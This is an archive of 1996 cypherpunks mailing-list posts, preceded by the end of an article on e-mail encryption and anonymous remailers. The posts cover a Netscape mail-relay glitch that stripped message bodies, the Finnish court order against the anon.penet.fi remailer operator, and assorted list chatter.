emailing to your boss might be another story. While there's no way to 
absolutely guarantee e-mail privacy on the Net, there is a fairly simple 
way to make it extremely hard for prying eyes to read your messages. 
It's called encryption, and there's a couple of good programs available 
that can teach you how to encode your messages.
	Encryption basically involves scrambling your outgoing messages 
to make them unintelligible. The recipient then unscrambles them on the 
receiving end, converting them back into plain English. There are 
several encryption programs available on the Internet. I recommend you 
try PGP, which stands for Pretty Good Privacy. You can download a free 
copy of PGP from the Massachusetts Institute of Technology Web site: 
http://web.mit.edu/network/pgp.html.
	Of course, PGP works only if you take the time to use it. To 
make that process easier, you should download a copy of Private Idaho, a 
free program that will make using PGP a point-and-click process. Private 
Idaho also will enable you to post anonymously to Usenet Newsgroups and 
do other neat tricks, such as anonymously access Web sites with your 
browser (you did know that you leave electronic "mouse tracks" when you 
visit Web sites, didn't you?)
	You can download a copy of Private Idaho from 
http://www.eskimo.com/(tilde)joelm. [retypist's note: yes, the article 
had "(tilde)" in place of "~"] Unfortunately for Mac users, Private 
Idaho is available only for Windows.
	If you really want to increase your Internet privacy, you might 
want to consider using anonymous remailers to send and receive your 
messages. These remailers strip your messages of your reutrn address and 
allow you to send e-mail that can't be easily traced back to you.
	There are many reamilers on the Net. Some are free, some charge. 
For a nice list to choose from, surf over to: 
http://www.cs.berkeley.edu/(tilde)raph/remailer-list.html. If you're 
REALLY paranoid about hiding your electronic tracks, you can send your 
message through several anonymous remailers, which will obscure your 
identity over and over again. To learn more about this process, check 
out http://www.replay.com/staff/usura/chain.html.
	To save some time typing in the addresses of all the remailers 
you want to use, try the Community ConneXion at: 
http://www.c2.org/remail/by-www.html. This site will allow you to 
point-and-click your way through the process of selecting remailers and 
sending your messages.
	Finally, for more information about on-line privacy, visit the 
Electronic Privacy Information Center: http://www.epic.org.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 25 Aug 1996 05:33:52 +0800
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Husband/Wife jailed for saying Clinton Sucks
Message-ID: <199608240535.WAA28490@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:34 PM 8/23/96 -0500, Robert A. Rosenberg wrote:
>At 20:49 -0800 8/21/96, jim bell wrote:
>
>>At 10:55 PM 8/21/96 -0400, Brian Davis wrote:
>
>>>That's because you like dead Presidents.
>>>
>>
>>$50's and $100's are great!
>
>Was Ben Franklin ($100) a President? I must have my list wrong or I did a
>sideways time jump without knowing <g>.


Remember, I added the part about the old dead fat philosophers, too!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 25 Aug 1996 09:38:20 +0800
To: "Scottauge@aol.com>
Subject: Re: Lesson 2 in cracking (cryptoanalysis 001)
Message-ID: <19960824053648140.AAA171@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 23 Aug 1996 08:25:42 -0400, Scottauge@aol.com wrote:

>>The point is that if you took two novels by the same author and
>>completely sorted them alphabetically they'd be almost the same.
>
>The examples cited did this by word, not by message as your stating.
>
>>So a block of PGP encrypted ascii-armored (i.e. 8=>7-bit encoding)
>>wouldn't affect the frequency counts?  Tell me, how long have you been on
>>your current medications?

>I was talking about the algorithm as given, not PGP.

I was just trying to point out that almost any email over a given size is going
to not only have nearly-infinite decode possibilities but also have somewhat
altered letter-frequency tables owing to all the software-added garbage.

>> That's the point!! IT'S A JOKE!!! You know, "hahaha - very funny"? Not a
>>  serious proposal?

>I know! But at least it is relevent to the group!  How many points of attack
>have you seen on here?  How many techniques have shown up here?

So far, 1.  And true, it is probably the most "on-topic" we've been in weeks...
<g>

>My apologies to the fella I called a troll.  It was uncalled for - lacking in
>social skills.

(That would have been me) No offence taken!

/ If you think education is expensive, try ignorance.
/ The government's reaction is to legislate, not educate. - Paul S. Penrod
/ Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
/ Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
/ Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
/ Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 25 Aug 1996 05:26:29 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Weird "Suppression" messages
In-Reply-To: <3.0b11.32.19960823190618.00ba29dc@mail.teleport.com>
Message-ID: <Pine.3.89.9608232204.A26805-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 23 Aug 1996, Alan Olsen wrote:

> At 10:54 PM 8/20/96 -0700, Rich Graves wrote:
> >   ----- Message body suppressed -----
> >
> >--SAA08114.840765294/tera.mcom.com--
> 
> This is bizzare.  I have gotten three messages with this message.
> 
> Is someone at Netscape canceling messages?  (mcom.com is the old domain name
> of Netscape.)
> 
> Anyone have any ideas on this?

I don't have a clue what it is, but it's sure pissing me off.  I've 
gotten about 15 or so of these messages in the past two hours.  If it's 
an honest error, then someone better fix it real fast; if some loser is 
jerking us around, ......


> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 25 Aug 1996 09:44:40 +0800
To: cypherpunks@toad.com
Subject: Netscape appears to be bouncing our stuff around within
Message-ID: <ae43e746000210046fee@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've gotten dozens of these "Message  body suppressed" things, including
copies of my _own_ messages sent out a couple of days ago (and received OK
the first time around).

It looks like " ns.netscape.com " got a copy from toad.com (see bottom of
block below), bounced it around within Netscape, and then resubmitted it to
toad.com (see top of block below), minus the message body.

--Tim


(most recent)

Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id TAA20948
for cypherpunks-outgoing; Fri, 23 Aug 1996 19:37:42 -0700 (PDT)

Received: from littlewing.mcom.com (h-205-217-255-33.netscape.com
[205.217.255.33]) by toad.com (8.7.5/8.7.3) with ESMTP id TAA20940 for
<cypherpunks@toad.com>; Fri, 23 Aug 1996 19:37:37 -0700 (PDT)

Received: (from root@localhost) by littlewing.mcom.com (8.7.3/8.7.3) id
TAA11550; Fri, 23 Aug 1996 19:40:07 -0700 (PDT)

Received: from maleman.mcom.com (maleman.mcom.com [198.93.92.3]) by
tera.mcom.com (8.6.12/8.6.9) with ESMTP id HAA16047 for
<mcom.list.cypherpunks@tera.mcom.com>; Fri, 23 Aug 1996 07:02:15 -0700

Received: from ns.netscape.com (ns.netscape.com.mcom.com [198.95.251.10])
by maleman.mcom.com (8.6.9/8.6.9) with ESMTP id SAA12104; Wed, 21 Aug 1996
18:17:30 -0700

Received: from toad.com (toad.com [140.174.2.1]) by ns.netscape.com
(8.7.3/8.7.3) with ESMTP id SAA00591; Wed, 21 Aug 1996 18:16:33 -0700 (PDT)

(oldest)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 25 Aug 1996 09:56:36 +0800
To: "Z.B." <zachb@netcom.com>
Subject: Re: Weird "Suppression" messages
Message-ID: <3.0b11.32.19960823232429.00d969ec@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 8/23/96 -0700, Z.B. wrote:
>On Fri, 23 Aug 1996, Alan Olsen wrote:
>
>> At 10:54 PM 8/20/96 -0700, Rich Graves wrote:
>> >   ----- Message body suppressed -----
>> >
>> >--SAA08114.840765294/tera.mcom.com--
>> 
>> This is bizzare.  I have gotten three messages with this message.
>> 
>> Is someone at Netscape canceling messages?  (mcom.com is the old domain name
>> of Netscape.)
>> 
>> Anyone have any ideas on this?
>
>I don't have a clue what it is, but it's sure pissing me off.  I've 
>gotten about 15 or so of these messages in the past two hours.  If it's 
>an honest error, then someone better fix it real fast; if some loser is 
>jerking us around, ......

Some list redirector of somesort has gone wonky at Netscape.  (Take a look
at the headers if you do not believe me.  They are originating off of some
internal lists at mcom.com, the original Netscape domain.)

Cypherpunks is not the only list effected by this.  I am getting these weird
messages on wwwsecurity as well.

Since it is Friday, I expect that this will be with us until someone gets in
the office on Monday.
---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 25 Aug 1996 07:12:59 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Weird "Suppression" messages
In-Reply-To: <3.0b11.32.19960823232429.00d969ec@mail.teleport.com>
Message-ID: <Pine.GUL.3.95.960823232719.8278B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


For your global killfile:

 /mcom\.list\./ in a Received: header.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: richieb@teleport.com (Rich Burroughs)
Date: Sat, 24 Aug 1996 16:30:46 +0800
To: cypherpunks@toad.com
Subject: FWD: Julf Forced to Reval Names
Message-ID: <321e6466.389454@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The article below was posted to the newsgroup alt.religion.scientology.
I cannot as of yet verify the contents.


Rich

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

-----BEGIN PGP SIGNED MESSAGE-----

Today on 22nd of August the local court of first instance in
Helsinki decided that Johan Helsingius has to reveal the email
adress asked for by the Police Department of Helsinki. This has to
be done within 30 days when summoned for interrogation.

Since this is merely a part of a case, this decision can't be
appealed. If Helsingius still refuses to reveal the info he will be
repeatedly fined and ultimately jailed for up to six months. The
decisions about fines and jail can be appealed, but an appeal won't
stay the execution of the ordered fine/jail, only a judgement of the
appeals court will. The questions about different appeals in this
case are somewhat complex and regarding the possibility to appeal it
was a split decision (4-1).

The court ruled against Helsingius in this matter. During the
hearing Helsingius argued against this view in many ways: he
objected on constitutional grounds and on grounds relating to
statutes regarding criminal investigation.

This information is based mainly on message <4vi0tt$geq@idefix.eunet.fi>
in the local Finnish newsgroup sfnet.keskustelu.laki, by Kaj Malmberg,
the police officer in charge of the investigation of the matter where
Scientology scriptures were posted through anon.penet.fi.

More reports from this case will probably follow soon.

[posted & mailed to a few individuals]

==========================================================================
 pjs@uwasa.fi, Student of Theology & Law Student at the U of Helsinki
 Disclaimer: Speaking for myself only. Always using PGP to sign articles.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBMhymBB1yhFX7KT+RAQHWEgQAw45nMBmJGKl1KXS/WkHL2rC4nGsZ8D97
AssSzKoMbB0Bw7M0tzZub9RzQY4Z9hVRXDxkvyxVoZtL1vZ7DqnIq8Xv/icy81Z5
g2BDy+r7fGqaEewKW3xuoKXSt1EuE765uRiweNqHpNIxBBDQGeEy+9qy/rs1KcwW
dioGxAsAyHo=
=TihY
-----END PGP SIGNATURE-----

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 25 Aug 1996 05:49:53 +0800
To: alexf@iss.net
Subject: Re: Spamming
In-Reply-To: <199608211955.PAA01059@phoenix.iss.net>
Message-ID: <199608241413.JAA14437@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <199608211955.PAA01059@phoenix.iss.net>, on 08/21/96 at 04:00 PM,
   "Alex F" <alexf@iss.net> said:

>   ----- Message body suppressed -----

O.K.

I have seen this on several messages.

What's up??



- --
- -----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
- -----------------------------------------------------------
 
MR/2 Tag->Windows: Just another pane in the glass.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh8Xi49Co1n+aLhhAQGv9wP9EyvGQXX8g2sIoEvnjqAzTEL5P7FoBZQt
ZfhYCv+RY+SKgosn3ElVqJaAy3U3UpwQOwxKmaFB51vBHVtEjoi+yndL5wg+hfiX
tjloHoV8jcbrvGOGIjfj6YVcwASKXQAv3ydQOX24CRzX5vElnRn96mbRpqJkPomy
rzPQD7VsljE=
=yXl6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Sun, 25 Aug 1996 05:21:00 +0800
To: cypherpunks@toad.com
Subject: Re: Weird "Suppression" messages
In-Reply-To: <3.0b11.32.19960823190618.00ba29dc@mail.teleport.com>
Message-ID: <321F0BDF.3DA0@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Yeah.  The headers on the 'SSL: The early days' mail from 
pgut001@cs.auckland.ac.nz look _pretty_ strange.

Brian Durham




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Durham <bdurham@metronet.com>
Date: Sun, 25 Aug 1996 05:33:42 +0800
To: cypherpunks@toad.com
Subject: [Fwd: SSL: The early days]
Message-ID: <321F0C26.102@metronet.com>
MIME-Version: 1.0
Content-Type: message/rfc822


To: cypherpunks@toad.com
Subject: SSL: The early days
From: pgut001@cs.auckland.ac.nz
Date: Thu, 22 Aug 1996 18:55:44 (NZST)
Reply-To: pgut001@cs.auckland.ac.nz
Sender: owner-cypherpunks@toad.com

   ----- Message body suppressed -----

--CAA28512.840792175/tera.mcom.com--








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Sun, 25 Aug 1996 05:27:46 +0800
To: "'cypherpunks@toad.com>
Subject: FW: "Freedom on Trial," from October 1996 Playboy
Message-ID: <01BB91A1.3FEBC9C0@crypto-1.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Forwarded Message<<
why is this happening ?? Is it my system or a remailer ?

   ----- Message body suppressed -----

--GAA11758.840807801/tera.mcom.com--


>>End of forwarded message<<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nick West <nick@multipro.com>
Date: Sun, 25 Aug 1996 05:32:24 +0800
To: bdolan@use.usit.net
Subject: Re: CIA Contra Crack and LA Gangs (fwd)
Message-ID: <199608241608.LAA04066@server.multipro.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:13 PM 8/20/96 -0400, you wrote:

>
>It also rained cocaine in Tennessee in the '80s, 
>but the authorities never seemed to notice.  Ask the Knoxville 
>_News-Sentinel_ how many stories it can find in its archives relating 
>to planes loaded with cocaine crash-landing on remote airstrips, 
>airdrops being found in citizens' yards, etc.  Then ask the DEA what it did 
>about those events.
>
>bd
>
One of our former mayors in my town, was brought to trial for this. He 
had allegedly paid off a police officer and/or the airport to let the plane 
land. From what I have heard it was pretty cut and dry that he did it. But 
all he had to do was get a lawyer that caught the government prosecution 
with their pants down and he's running for city council this year. Its a 
shame. I haven't heard the DEA mentioned by anybody. 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMh8MFMF7aWKjtgVVAQFeHwQAvZDBWOEl4CuWY+A8oMe4F5zs6B7LU1Su
j/KZ3h0Z1P6P/Oxqut98NQO48Wzz5O3EpivjOGEvChsR2e+Au/rfXwt9PxQ8DeMd
26UwFy/3yYJWQtckcPmNhxtE13FflkyGBi/QgRLX7spFFhD0a4Ooyaekq+D0UZ5c
kYLUiFasrjA=
=Xxf7
-----END PGP SIGNATURE-----

Nick West
nick@multipro.com
Member of the National Wild Turkey Federation and 
The Libertarian Party of Tennessee

http://members.tripod.com/~NWest/index.html

PGP Fingerprint= F9 F7 92 D9 D3 0B 56 3E  FA 2A 78 59 27 32 7D 6F

Public key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nick West <nick@multipro.com>
Date: Sun, 25 Aug 1996 05:34:48 +0800
To: cypherpunks@toad.com
Subject: Richard Jewell case
Message-ID: <199608241608.LAA04081@server.multipro.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:


>By the way, the case against Richard Jewell, "THE ATLANTA BOMBER!!!!,"
>continues to crumble...the voice on the 911 call doesn't match his, he
>couldn't have gotten to the phone at the time the call was made, and the
>hordes of investigators who tore his apartment apart (and his cabin, and so
>on) found no real evidence (just the "profile" evidence: some gun
>magazines, a photo of him cradling an AR-15, his weight, and probably a
>subscription to The Playboy Channel).
>
>Further, experts point out that if Jewell was working with an accomplice
>(to make the phone call), this blows all conventional theories of a
>"would-be hero" out of the water: the last thing such a would-be hero wants
>is an accomplice, who shares in the risk but gets none of the credit, and
>who could turn him in.

Don't expect his name to be cleared until they find another "suspect". The 
only reason he's being kept under investigation is to keep the FBI from 
coming under attack by the public for not having a suspect. In other words 
he's being kept as a poster boy for the case until they can find another one. 

Nick West
nick@multipro.com
Member of the National Wild Turkey Federation and 
The Libertarian Party of Tennessee

http://members.tripod.com/~NWest/index.html

PGP Fingerprint= F9 F7 92 D9 D3 0B 56 3E  FA 2A 78 59 27 32 7D 6F

Public key available on request.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: maintains <maintains@nemesis.meaning.com>
Date: Sun, 25 Aug 1996 07:08:02 +0800
To: cypherpunks@toad.com
Subject: EVIL GUVMINT suppresses our mailing list. message bodies are truncated. we can circumvent the looming censorship if we compose our messages such that all the text goes into the Subject: lines. Please use only subjects to transmit your views. Thank you.
Message-ID: <199608242012.NAA16720@black.colossus.net>
MIME-Version: 1.0
Content-Type: text/plain


 - - - MESAGE BODY SUPPRESED _ _ _ - - - 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 25 Aug 1996 05:36:09 +0800
To: Censored Girls Anonymous <carolann@censored.org>
Subject: Re: Ruritania
In-Reply-To: <2.2.16.19960821191809.377f6c4c@primenet.com>
Message-ID: <199608241732.NAA22285@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Censored Girls Anonymous writes:
>                       The Legend of Ruritania
> 
> There was once a far away land called Ruritania, and in this land there was
> a strange phenomenon  --  all the trees that grew there were transparent. 
> In the old days, the people had lived in mud huts.   But now, high-tech wood
> technology had been developed,  and in this new age of wood, everyone in
> Ruritania found that their homes were all 100% see through. 

When people repost my writing, I prefer that they leave some
indication on that I wrote it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Sun, 25 Aug 1996 06:47:36 +0800
To: peter.allan@aeat.co.uk (Peter M Allan)
Subject: Who Is Littlewing? or Supressed Message.
Message-ID: <199608242035.NAA19816@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Message header:

Received: from toad.com (toad.com [140.174.2.1]) by
adnetsol.adnetsol.com (8.6.12/8.6.6) with ESMTP id MAA19273; Sat, 24
Aug 1996 12:59:47 -0700 Received: (from majordom@localhost) by
toad.com (8.7.5/8.7.3) id VAA22074 for cypherpunks-outgoing; Fri, 23
Aug 1996 21:17:39 -0700 (PDT) Received: from littlewing.mcom.com
(h-205-217-255-33.netscape.com [205.217.255.33]) by toad.com
(8.7.5/8.7.3) with ESMTP id VAA21979 for <cypherpunks@toad.com>; Fri,
23 Aug 1996 21:13:56 -0700 (PDT) Received: (from root@localhost) by
littlewing.mcom.com (8.7.3/8.7.3) id TAA09395; Fri, 23 Aug 1996
19:27:56 -0700 (PDT) Received: from maleman.mcom.com (maleman.mcom.com
[198.93.92.3]) by tera.mcom.com (8.6.12/8.6.9) with ESMTP id GAA14308
for <mcom.list.cypherpunks@tera.mcom.com>; Fri, 23 Aug 1996 06:54:09
-0700 Received: from ns.netscape.com (ns.netscape.com.mcom.com
[198.95.251.10]) by maleman.mcom.com (8.6.9/8.6.9) with ESMTP id
FAA06409; Thu, 22 Aug 1996 05:08:50 -0700 Received: from toad.com
(toad.com [140.174.2.1]) by ns.netscape.com (8.7.3/8.7.3) with ESMTP
id FAA01875; Thu, 22 Aug 1996 05:07:52 -0700 (PDT) Received: (from
majordom@localhost) by toad.com (8.7.5/8.7.3) id EAA13213 for
cypherpunks-outgoing; Thu, 22 Aug 1996 04:49:00 -0700 (PDT) Received:
from aeat.co.uk (gw.aeat.co.uk [151.182.136.1]) by toad.com
(8.7.5/8.7.3) with ESMTP id EAA13206 for <cypherpunks@toad.com>; Thu,
22 Aug 1996 04:48:53 -0700 (PDT) Received: from
clare.risley.aeat.co.uk by aeat.co.uk (8.7.1/AEAT-GW-1.3)
 id MAA20980; Thu, 22 Aug 1996 12:48:47 +0100 (BST)
Received: by clare.risley.aeat.co.uk (4.1/SMI-4.1)
 id AA13676; Thu, 22 Aug 96 12:49:06 BST
Date: Thu, 22 Aug 96 12:49:06 BST
From: peter.allan@aeat.co.uk (Peter M Allan)
Message-Id: <9608221149.AA13676@clare.risley.aeat.co.uk>
To: cypherpunks@toad.com
Subject: Re: cryptoanalysis 002
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-PMFLAGS: 33554560 0

   ----- Message body suppressed -----

--GAA14322.840808677/tera.mcom.com--



===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nathan poznick <npoznick@Harding.edu>
Date: Sun, 25 Aug 1996 07:25:39 +0800
To: cypherpunks@toad.com
Subject: Re: Husband/Wife jailed for saying Clinton SucksHusband/Wife jailedfor say
In-Reply-To: <Pine.SOL.3.94.960822012737.28294B-100000@harding.edu>
Message-ID: <Pine.SOL.3.94.960824140004.25737A-100000@taz>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 22 Aug 1996, nathan poznick wrote:

>    ----- Message body suppressed -----
> 
> --CAA28506.840792176/tera.mcom.com--

what is the deal with this??? i never sent anything relating to this
thread?
nate.


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^		             Nathan Poznick				 ^
^	        	 <npoznick@harding.edu>				 ^
^                    http://www.harding.edu/~npoznick			 ^
^									 ^
^                  "640k should be enough for anybody."			 ^
^									 ^
^		          --Bill Gates, 1981--				 ^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 25 Aug 1996 10:17:49 +0800
To: cypherpunks@toad.com
Subject: Degaussing a pile of 5.25" media
Message-ID: <0ig7sD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I have 3 bags full of 5.25" diskettes (in NYC). Can someone please let me use
their degausser before I get rid of them? (Anyone who wants them after they're
degaussed is welcome to them :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 25 Aug 1996 08:09:51 +0800
To: Mike Howell <451degree@msn.com>
Subject: Re: your mail
In-Reply-To: <UPMAIL01.199608241925150568@msn.com>
Message-ID: <Pine.3.89.9608241425.A9386-0100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 24 Aug 1996, Mike Howell wrote:

> Does anybody know what I can get for generating the credit card numbers?
> 
At least 5 years in prison...

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 25 Aug 1996 05:35:15 +0800
To: cypherpunks@toad.com
Subject: HYS_ter
Message-ID: <199608241449.OAA21593@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-24-96. NYP: 
 
   "Investigators Look at History of Terrorism to Compile a 
   List of Suspects in Crash." 
 
      Over the years, terrorists have demonstrated frightening 
      expertise in making bombs and concealing them. "The fact 
      of the matter is that we found out terrorists could 
      create bombs that were very, very difficult to detect," 
      says the FBI. 
 
      "A fairly small amount, well placed, can do the job," 
      said Dr. Jimmie Oxley, of the NRC's airline security 
      committee. "A colleague once said he could do it with a 
      gram, in the right place." 
 
      Bomb-making technology continually advances, as Israeli 
      authorities discovered in 1986 when they intercepted a 
      suitcase being smuggled in from the Gaza Strip. The 
      terrorists appeared to have spun the suitcase on a 
      centrifuge that allowed the plastic explosive to flow 
      into its corners and virtually disappear. 
 
      Ariel Merari, who has studied hundreds of terrorist 
      incidents, says bombers are limited only by their own 
      imaginations when it comes to building bombs and finding 
      ways to get them aboard airliners. "However," he said, 
      "the use of sophisticated bombs are more likely to be 
      the work of state-sponsored terrorism than anything 
      else." 
 
   ----- 
 
   http://jya.com/hyster.txt  (11 kb) Via: www.anonymizer.com 
 
   HYS_ter 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Sun, 25 Aug 1996 08:10:48 +0800
To: Mike Howell <451degree@msn.com>
Subject: Generating credit card numbers
In-Reply-To: <Pine.BSD.3.92.960824164920.19156A-100000@miso.wwa.com>
Message-ID: <Pine.SUN.3.94.960824144917.3347A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 24 Aug 1996, Mike Howell wrote:
 
> Does anybody know what I can get for generating the credit card 
> numbers?

Since this is a federal offense, I would think 5-10 years in the 
federal pen.

William Knowles
erehwon@c2.net
 

--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 25 Aug 1996 05:36:28 +0800
To: cypherpunks@toad.com
Subject: SLE_uth
Message-ID: <199608241459.OAA22389@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-25-96. NYP: 
 
   "When Buildings Fall, an Engineer Becomes a Sleuth." 
 
   A zero-crypto report on forensic engineering firms which 
   investigate blimp-market buildings rigged-to-blow by  
   cardinal conspiracy of the realestate.pumpery. 
 
   ----- 
 
   http://jya.com/sleuth.txt  (9 kb) 
 
   SLE_uth 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Bostick <abostick@netcom.com>
Date: Sun, 25 Aug 1996 10:31:06 +0800
To: Mike Howell <451degree@msn.com>
Subject: Re: your mail
In-Reply-To: <UPMAIL01.199608241925150568@msn.com>
Message-ID: <Pine.3.89.9608241545.A26620-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 24 Aug 1996, Mike Howell wrote:

> Does anybody know what I can get for generating the credit card numbers?
> 

One to five years in a Federal prison.

Alan Bostick               | If you can't say anything good about someone,
mailto:abostick@netcom.com | sit right here by me.
news:alt.grelb             |      Alice Roosevelt Longworth
http://www.alumni.caltech.edu/~abostick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daemon@anon.penet.fi
Date: Sun, 25 Aug 1996 05:32:16 +0800
To: cypherpunks@toad.com
Subject: Anonymous nickname changed.
Message-ID: <9608241335.AA15080@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested the replacement or assignment of a nickname
Your nickname is now Crypto Anarchist.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Seanor <cibir@netcom.com>
Date: Sun, 25 Aug 1996 12:21:05 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: Re: Web Resource on Netspam
In-Reply-To: <319812D5.604D8509@pobox.com>
Message-ID: <Pine.3.89.9608241811.A1520-f200000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


Another source for help in "spammers" is:
	
	http://www.netcheck.com

They have helped to get some spammers accounts cancelled.

Joseph Seanor
CIBIR Corporation
